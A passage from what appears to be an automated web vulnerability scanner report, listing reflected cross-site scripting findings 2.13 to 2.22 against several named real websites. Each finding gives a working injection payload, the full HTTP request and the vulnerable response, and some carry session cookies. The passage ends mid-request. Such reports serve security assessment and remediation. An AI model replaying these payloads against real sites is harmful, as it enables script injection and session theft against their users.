Content-Type: text/html; charset=UTF-8
Content-Length: 27261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
</script>607f7<script>alert(1)</script>42eba27e39e');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI3MC9zaWQva3l6SzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

2.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: arbor.custhelp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:41:09 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly
RNT-Time: D=114429 t=1296697269254262
RNT-Machine: 04
F5_do_compression: yes
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 27211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c');
RightNow.Url.setSession('L3RpbWUvMTI5NjY5NzI2OS9zaWQvakxsSzhGbGs=');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHE
...[SNIP]...

2.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:43 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly
Content-Length: 25622
RNT-Time: D=131773 t=1296691423739902
RNT-Machine: 07
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT
...[SNIP]...

2.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:48 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly
Content-Length: 25600
RNT-Time: D=113558 t=1296691428704362
RNT-Machine: 03
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955=');
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","EUF_DT_CHECK":12,"EUF_DT_DATE":1,"EUF_DT_DATETIME":2,"EUF_DT_FATTACH":11,"EUF_DT_HIERMENU":9,"EUF_DT_INT":5,"EUF_DT_MEMO
...[SNIP]...

2.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:37 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/
Date: Wed, 02 Feb 2011 22:01:37 GMT
Connection: close
Content-Length: 2725

var bt_ad_content285777f27fe;alert(1)//63b819cf766=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset
...[SNIP]...

2.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 22:01:48 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/
Date: Wed, 02 Feb 2011 22:01:47 GMT
Connection: close
Content-Length: 2739

var bt_ad_content285777=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert
...[SNIP]...

2.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c1d2fc6ab0b28cb830f386445ab8cff6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:24 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:28 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNjG1rgVcMFxcmAao; expires=Thu, 02-Feb-2012 23:12:28 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1&amp;_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

2.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8db8318b3aec88529bd6bbe8faa4161d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:47 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNrOwrgVcMFxcqQat; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:15:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0bbc7478bd0028f532aea9869f768f0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:15:42 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:15:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTG2rgVcMFxcnAao; expires=Thu, 02-Feb-2012 23:15:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e?_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

2.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:16:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ae8dc79f24404a880282c7bbf5b19e4b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:16:12 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:16:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTe2rgVcMFxcqAar; expires=Thu, 02-Feb-2012 23:16:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
